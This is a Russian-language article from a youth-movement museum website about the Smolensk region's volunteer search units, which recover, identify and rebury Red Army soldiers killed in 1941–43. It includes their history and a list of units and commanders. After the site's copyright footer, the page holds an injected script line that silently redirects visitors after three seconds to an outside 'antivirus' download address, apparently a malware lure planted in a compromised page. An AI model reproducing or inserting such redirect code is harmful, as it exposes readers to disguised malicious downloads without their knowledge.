Отдавая долги
 
 

Отдавая долги

МОЛОДЕЖЬ СМОЛЕНЩИНЫ В ПОИСКОВОМ ДВИЖЕНИИ

Легко ли в наше время быть молодым? Кому-то кажется легко, беззаботно, «думай только о себе». Тем более что индивидуализм, цинизм не только по отношению к дням сегодняшним, но и к нашему героическому прошлому активно внедряется в сознание и средствами массовой информации, и пропагандируемым образом жизни.
Лучшая часть молодежи не приемлет эти так называемые «новые ценности». Молодые люди ищут возможности для объединения, для полезных, общественно значимых дел. Одним из таких новых явлений стало поисковое движение, объединившее значительную часть молодежи по всей стране.
Поисковое движение зародилось в середине 80-х годов прошедшего столетия. Оно было поддержано ЦК ВЛКСМ, благодаря чему было проведено три Всесоюзных «Вахты Памяти» в 1989, 1990 и 1991 годах. В 1990 году Всесоюзная «Вахта» прошла на Смоленской земле.
В этом нет ничего неожиданного. Ведь известно, что в 1941-1943 г.г. Смоленщина была ареной ожесточеннейших сражений с немецко-фашистскими захватчиками, рвавшимися к Москве в соответствии с «планом Барбаросса». В первые месяцы войны развернулось грандиозное Смоленское сражение, которое современные историки по масштабу и количеству участников с обеих сторон справедливо приравнивают к Московской и Сталинградской битвам. В октябре 1941 года под Вязьмой сомкнулись клещи страшного гитлеровского «котла», в окружении героически сражались и погибали, защищая подступы к столице, сотни тысяч солдат и офицеров Красной Армии. Тысячи полегли здесь, оставшись непогребенными, без вести пропавшими. Так что появление и быстрое распространение на Смоленщине поискового движения было правомерным и естественным. Первейшей своей задачей его участники считают поиск и перезахоронение со всеми воинскими и христианскими почестями павших героев, восстановление по медальонам имен погибших воинов и оповещение об этом родственников, которых предварительно надо еще разыскать.
В настоящее время поисковые отряды работают более чем в 20 районах области и объединяют около тысячи человек. Их работу opганизует и направляет Государственное учреждение «Смоленский областной центр героико-патриотического воспитания и социальной помощи молодежи «Долг», расположенный в г.Вязьме. Директором центра является Н.Г. Куликовских.
Но все это родилось не сразу и имеет довольно длинную и интересную историю.

НЕМНОГО ИСТОРИИ

В начале 80-х годов в Смоленских лесах появились молодые люди, которые называли себя поисковиками. Это были первые поисковые отряды в нашей области: «Память» в Гагарине (командир В. Н. Швыдкин), «Поиск» в Сафонове (А. Н. Шалаев), «Витязь» в Смоленске (А.В. Баринов).
В Вязьме энтузиастом-одиночкой был Геннадий Слесарев, работник одного из вяземских заводов. Его деятельность привлекла внимание, особенно после большой публикации в местной прессе. Человек благородный и независимый, он на свой страх и риск исследовал вяземские леса, буквально напичканные всевозможным «железом» (так поисковики называют металлические предметы, разбросанные во множестве после войны) и останками погибших. В 1986 году Вера Буланова, скромный комендант молодежного общежития, организовала первый в Вязьме отряд «Поиск», объединив учащуюся молодежь. Она смогла привлечь внимание к поиску и взрослых парней. Игорь Пронин, Андрей Никитин, отслужившие армию, и другие молодые люди своим участием придали этой работе серьезное значение. К этому времени, в 1985 году, секретарь организации КПСС совхоза «Днепропетровский» А. Клименков создал недалеко от деревни Красный Холм первое в России Поле Памяти. Именно здесь и вблизи окрестных деревень было самое страшное пекло в октябрьские дни 1941 года. На Поле Памяти стали в торжественной обстановке проводить перезахоронение найденных в процессе поиска останков.
Примерно в это же время и в других районах области создаются поисковые отряды: «Память» в Рославле (И. Жарынцев), «Боец» в Дорогобуже (С. Голубков) и другие. В 1989 году маленький отряд из семи своих учеников создала в своей средней школе № 5 города Вязьмы заместитель директора по внеклассной работе Н.Г. Куликовских. Отряд решили назвать «Долг».
К этому времени школе № 5 уже было присвоено имя генерал-лейтенанта М.Г. Ефремова, трагически погибшего под Вязьмой в апреле 1942 года. Пятая школа была широко известна не только на Смоленщине своей краеведческой работой. Ее историки-краеведы - заслуженные учителя РСФСР (ныне Почетные граждане города Вязьмы) П.М. Запорин и СИ. Борисов - создали первый послевоенный школьный музей (1954 год), собрали громадный краеведческий материал, что позволило возродить на его базе утраченный в годы войны городской историко-краеведческий музей. Весь педагогический и ученический коллективы были увлечены краеведением и собирательством. В этой школе Нина Куликовских окончила десять классов, после завершения образования в Смоленском педагогическом институте по специальности история вернулась в родную школу преподавателем истории и заняла должность организатора внеклассной работы. Человек увлеченный, неравнодушный, наделенный богатой фантазией, имеющий к этому времени большой опыт массовой комсомольской работы, Нина Германовна интуитивно поняла, какое большое воспитательное значение имеет поисковая работа. В конце 80-х, когда в стране резко изменились ориентиры, когда слово «патриот» приобрело почти ругательный смысл, именно в поисковой работе Н.Г. Куликовских хотела сохранить то лучшее, что позволяло продолжать и патриотическую, и краеведческую, и массовую воспитательную работу с подрастающим поколением. Она из тех, о ком великий Гегель сказал: «Они внешнюю необходимость осознают как собственную жизненную цель». В самом деле, никто из поисковиков, в том числе и Куликовских, не виноваты в том, что тысячи наших солдат остались незахороненными в той войне, но именно они сделали своей личной целью, задачей найти их останки и спустя пусть десятки лет достойно предать их земле, восстановить доброе имя хотя бы некоторых. Недавно как-то прозвучало, что среди тех, кто сражался и умирал под Вязьмой и в октябре 1941, и зимой в январе-марте 1942 в составе 33-й армии под командованием генерала М.Г. Ефремова, нет ни одного Героя Советского Союза.
В 1990 году в четырех районах Смоленской области прошла Всесоюзная «Вахта Памяти - 90». Смоленские отряды «Витязь» Андрея Баринова, «Поиск» Веры Булановой, «Десант» Юрия Смирнова, «Поиск» Александра Архипова, «Долг» Нины Куликовских и многие другие приняли в ней участие. Работа с опытными поисковиками, приобщение к их большому коллективу, этому своеобразному поисковому братству, участие в церемонии торжественного захоронения обнаруженных останков произвели на ребят и их руководителей громадное впечатление. Они поняли, что стоят на правильном пути.
Зимой члены вяземского отряда «Долг» работали с найденными медальонами, разыскали нескольких родственников, провели вечер встреч, вечера памяти погибших, так что не только пятая школа – скоро весь город знал о развернувшемся поисковом движении.
В 1994 году В. Буланова отошла от поиска, и все вяземские поисковики объединились вокруг отряда «Долг». Возникали другие отряды в различных учебных заведениях: школах № 3, 4, 7, Вязьма-Брянской школе, ПУ-5, но центром всей работы оставался отряд «Долг» на базе школы № 5.
Поисковики под руководством Н.Г. Куликовских сделали несколько громких находок. Так, в октябре 1995 года все средства массовой информации России писали и говорили о поисковиках Вязьмы, нашедших останки легендарного капитана И.А. Флерова, командира одной из первых «катюш», погибшего в засаде в октябре 1941 года. В 1996 году, в год 300-летия Российского флота, работая на месте прорыва окруженных войск под Богородицком, поисковики нашли вместе с останками погибших воинов фрагменты морского снаряжения, безусловно, свидетельствующие о том, что моряки-балтийцы из 200-го особого арт-дивизиона дрались здесь, на нахимовских местах, в октябре 1941 года. В 1997 году, в год 100-летия со дня рождения генерала М.Г. Ефремова (ему к этому времени присвоили посмертно звание Героя России) поисковики работали на местах боев 33-ей армии, героически погибшей в угранских и вяземских лесах. В 2000 году поисковики обследовали в дозволенных пределах места захоронения жертв Вяземского лагеря для военнопленных, созданного фашистами в городе...
Одно только это перечисление дает представление о важности и значительности работы, проводимой поисковиками. Но ведь их деятельность не сводилась только к поиску. В 1997 году Н.Г. Куликовских ушла из школы, сосредоточившись на поисковой работе. Ее авторитет среди смоленских поисковиков был уже так высок, что когда в областной администрации приняли решение о создании в области центра по координации и руководству поисковыми отрядами всего региона, то кандидатура директора центра была одна - Н.Г. Куликовских. Поскольку она жила в Вязьме, центр решено было разместить в этом районном городе. Центр назвали «Долг» - по названию поискового отряда Нины Германовны. Ей самой и ее первым сотрудникам пришлось «искать» помещение, ремонтировать и оформлять его, разрабатывать единые для всех отрядов образцы документов, налаживать отчетность, собирать архив. В 1999 году в центре «Долг» был открыт Музей Неизвестного солдата, ставший центром патриотической работы
В настоящее время Смоленский областной центр «Долг» широко известен в российском поисковом движении, в ветеранских организациях, в Министерстве Обороны России, в патриотических организациях страны. На проводимые им «Вахты Памяти» подают заявки поисковики многих регионов страны. Авторитет смоленского поискового объединения высок как никакой другой. Вот несколько строк из Благодарственного письма 2005 года, присланного на имя губернатора Смоленской области В.Н. Маслова от администрации и Совета ветеранов Владимирской области: «Смоленская область достойно представлена на карте поискового движения России. Смоленский областной центр героико-патриотического воспитания и социальной помощи молодежи «Долг» проводит огромную работу по поиску и перезахоронению солдат и офицеров Красной Армии, погибших в годы Великой Отечественной войны. Отрадно, что смоленские поисковики сотрудничают с единомышленниками нашей области. Ежегодно Сводный отряд Владимирской области участвует в Вахте Памяти на Смоленщине. Благодаря грамотной и квалифицированной работе сотрудников центра «Долг» поисковые работы проводятся на высоком организационно-методическом уровне». 

ПОИСКОВИКИ СМОЛЕНЩИНЫ

В настоящее время центр «Долг» объединяет 35 поисковых отрядов 20 районов Смоленской области.

  • Велиж

     

    1. ПО «Воин»

    командир Гренко А.И.

     

    Вязьма

     

    Поисковое объединение «Долг»
    2. ПО «Поиск»
    3. ПО «Славяне»
    4. ПО «Прорыв»
    5. ПО «Центр»
    6.ПО «Русь»

    командир Михайлов И.Г.
    командир Никитин А.В.
    командир Михайлов И.Г.
    командир Себекин М.Ю.
    командир Пронин И.А.
    командир Орлов В.Г.

     

    Гагарин

     

    7. ВПО «Память»
    8. ПО «Рейд»
    9. ПО «Курсант»

    командир Миронов Н.А.
    командир Виноградов В.И.
    командир Прохоренков С. А.

     

    Демидов

     

    Поисковый клуб «Патриот»
    10. ПО Смоляне»
    11. ПО «Феникс»
    12. ПО «Чека»

    руководитель Корнеев А.В.
    командир Корнеева Т.Н.
    командир Мелехов Н. И.
    командир Лакеенков И.

     

    Десногорск

     

    13. ПО «Обелиск»
    14. ПО «Соколята»

    командир Орешкин Е.
    командир Голованов А.

     

    Дорогобуж

     

    15. ПО «Боец»

    командир Голубков СИ.

     

    Духовщина

     

    16. ПО «Возрождение»

    командир Тетерин Ю.Н.

     

    Ельня

     

    17. ПО «Гвардеец»

    командир Громов В.В.

     

    Кардымово

     

    18. ПО «Поиск»
    19.клуб «Ритм»

    командир Балобанов А.А.
    командир Громовой Ю.Ф.

     

    Починок

     

    20.ПО «Факел»

    командир Моргунов А.В.

     

    Рославль

     

    21. ПО «Память»
    22. ПО-спутник «Поиск»

    командир Жарынцев И.А. командир Козлова Н.И.

     

    Рудня

     

    23. ПО «Штандарт»

    командир Голубев В.

     

    Сафоново

     

    24. ПО «Мемориал»

    командир Турушев И.В.

     

    Смоленск

     

    25. ПО «Витязь»
    26. ПО «Медведь»
    27.ПО «Эдельвейс. Поиск»

    командир Баринов А.В.
    командир Туров А.В.
    командир Клембо Д.В.

     

    Сычевка

     

    28. ПО «Каскад»
    29. ПО «Возрождение»

    командир Степанов А.С.
    командир Жохов А.В.

     

    Темкино

     

    30. ПО «Надежда»

    командир Назарова З.Б.

     

    Угра

     

    31 ПО «Набат»

    командир Синдеева Л.А.

     

    Холм-Жирки

     

    32. ПО «Эхо»

    командир Якуненская Е.Г.

    Шумячи

     

    33. ПО «Звезда»

    командир Федотов С.Н.

    Ярцево

     

    34. ПО «Безымянный»
    35. ПО «Восток»

    командир Зуев А.В.
    командир Лопухов А.В.

Поисковики - это особый народ. Все они пришли в поиск добровольно, зная, что здесь работают бесплатно, в период своих отпусков и каникул, заслуженных отгулов и дней за свой счет и даже бюллетеней. В общественных поисковых организациях объединены люди разных возрастов (начиная с 14 лет) и профессий, разного социального положения и статуса, с разным образованием и интересами. В нашем движении много педагогов, которые приводят в поиск своих учеников Н.И. Козлова, А.А. Жуков, А.В. Корнеев, А.В. Жохов, а Г.В. Гуренков и Ю.Ф. Громовой – директора сельских школ. С.Н. Федотов – начальник районной сельхозтехники, А.В. Дорошенко - майор милиции, И.А. Жарынцев - электрик автоагрегатного завода, Д.В. Клембо - работник автосервиса, И.Г. Михайлов, З.Б. Назарова, СИ. Голубков, А.В. Моргунов - специалисты администраций муниципальных образований. Женщины в поиске - нечастое явление, особенно когда они матери, особенно когда они матери четверых детей, как Елена Якуненская и Наталия Дорошенко. Всех их объединяют такие человеческие качества, как неравнодушное отношение к истории своего Отечества, активная гражданская позиция, забота о судьбе будущего поколения, особый кодекс чести поисковика.

 НЕКОТОРЫЕ ФОРМЫ РАБОТЫ

«Долг» не случайно назван центром героико-патриотического воспитания молодежи, ибо главная его цель - воспитание патриотизма, гражданственности, чувства общественного долга и преданности Отечеству, готовности к его защите.
Каковы же основные направления деятельности центра «Долг»?
Организация и проведение поисковых экспедиций на местах боев в годы Великой Отечественной войны. Подготовка и проведение районных, областных, межрегиональных, всероссийских и международных «Вахт Памяти».
Ежегодно проводится 15-17 поисковых экспедиций различной категории. За пять лет (1999-2004 г.г.) проведено 113 поисковых экспедиций, обнаружено и перезахоронено с соблюдением воинских почестей и христианского обряда 12 746 останков погибших воинов в ходе 71 захоронения. Захоронения проводятся на Полях Памяти или в специальных братских могилах. Первое Поле Памяти, как уже сказано, было открыто под Вязьмой возле деревни Красный Холм. К настоящему времени здесь нашли последнее упокоение около четырех тысяч погибших героев. При этом установлены имена тех, кто десятки лет считался пропавшим без вести. На мраморных досках написаны эти имена. Сюда приезжают родственники этих людей, чтобы поклониться праху своих родных. Поэтому розыск родственников погибших - одно из важных направлений в деятельности центра «Долг». Процедура захоронения отработана до мелочей, это торжественное и печальное событие, на котором присутствуют представители администрации, ветераны Великой Отечественной войны, приехавшие родственники, молодежь. И конечно, поисковики, которые осуществляют захоронение под сухой треск военного салюта. Перед этим священник совершает обряд отпевания.
Сегодня Поля Памяти созданы в разных районах Смоленской области: в Сычевке, Темкине, Демидове, Угре, Ярцеве; появились новые братские захоронения на Кургане Славы в Десногорске, на Гагаринской земле, в пос. Озерный Духовщинского района, в Шумячах, Xолм-Жирках...
За последние годы найдены и прочитаны сотни медальонов, разысканы десятки семей. Многие пишут письма в центр «Долг». Здесь, в музее, ведется Книга Памяти с фотографиями погибших и письмами их родных.
Любое поисковое мероприятие требует тщательной подготовки документального обоснования. В самом деле, не поедешь ведь куда глаза глядят с сотнями людей. Поэтому командиры поисковых отрядов и сотрудники центра «Долг» каждую зиму выезжают в ЦАМО (Центральный архив Министерства обороны) в г. Подольск для работы с документами, чтобы точнее определить место летних экспедиций. При этом поисковики нередко становятся настоящими исследователями и пишут научные работы. Так, командир вяземского районного объединения поисковых отрядов «Долг» И.Г. Михайлов уже несколько лет изучает материалы и документы по «вяземскому окружению» 1941 года. Он уже опубликовал несколько статей, выступал на научных конференциях. Сейчас он работает над кандидатской диссертацией по этой теме.
К работе над кандидатской диссертацией приступила и Н.Г. Куликовских. Интересное исследование выполнил А.В. Корнеев, командир поискового клуба «Патриот» из Демидова. Его тема «Дважды рожденная» посвящена судьбе 145-й стрелковой дивизии, несколько месяцев противостоявшей врагу около г. Демидова в 1942-1943 г.г. Большой материал собрал А. Моргунов, командир поискового отряда «Факел» из Починка, о судьбе группы частей 28 армии под командованием генерала-лейтенанта В.Я. Качалова. У каждого из тех, кто работает в архиве, обычно есть своя тема. Особенно тщательно готовятся командиры тех районов, где запланированы большие вахты. В течение всех этих лет активными и «результативными» исследователями являются Г.А. Горохов, С.И. Голубков (Дорогобужский район), Н.А. Миронов, П.П. Белов (Гагаринский район), В.Н. Стародубов (Рославльский район) и другие

Самая большая вахта - Международная учебно-тренировочная. На территории Смоленской области она проходила уже более десяти раз. Необходимость такой вахты связана с тем, что ежегодно в ряды поискового движения вливаются новые юные бойцы. Зимой командиры в городах занимаются с ними по «Курсу молодого бойца», разработанному в центре «Долг». На Вахте идет практическая отработка полученных знаний. На учебную вахту съезжаются сотни людей из десятков регионов России и ближнего (а иногда и дальнего) зарубежья. Для этой вахты разрабатывается специальная программа теоретических и практических занятий, конкурсы, фестивали, спортивные соревнования, встречи, на чтение лекций приглашаются крупные специалисты по истории и поисковому делу, по правовым аспектам этой работы, по технике безопасности и обращения с взрывоопасными предметами. Достаточно посмотреть на программу любой такой вахты, чтобы понять, как много полезного там делается, как интересно проходит это мероприятие.

Нина Германовна Куликовских, директор Смоленского областного центра героико-патриотического воспитания и социальной помощи молодежи «Долг»

Молодёжь Смоленщины - 2005: Информационно-аналитический сборник. - Смоленск: ООО "Универсум", 2005. - С.27-38

 


Литература
Так это было

"Так это было.
Смоленский
комсомол 1960-80
годов в воспоминаниях
современников"
"Отдавая долги"
"Отдавая долги"

Спонсоры музея истории молодежного движения

 

Выражаем огромную благодарность людям, которые приняли и принимают участие в жизни музея и комплектации его фондов.


       
      
    (c) Авторские права на сайт принадлежат ООО "Союз ДМ", Смоленской областной общественной организации Общероссийской общественной организации "Российский Союз Молодежи", 2008-2012г.  
setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>